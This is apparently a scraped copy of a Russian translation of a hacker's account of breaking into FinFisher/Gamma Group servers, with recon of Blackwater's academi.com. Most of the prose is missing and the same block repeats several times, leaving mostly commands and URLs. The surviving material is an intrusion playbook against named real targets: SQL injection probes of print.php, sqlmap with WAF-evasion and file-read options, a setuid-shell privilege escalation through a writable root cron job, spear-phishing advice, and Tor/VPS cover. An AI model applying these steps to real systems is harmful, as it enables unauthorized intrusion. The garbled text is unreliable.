NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
 ___________
< got r00t? >
 -----------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
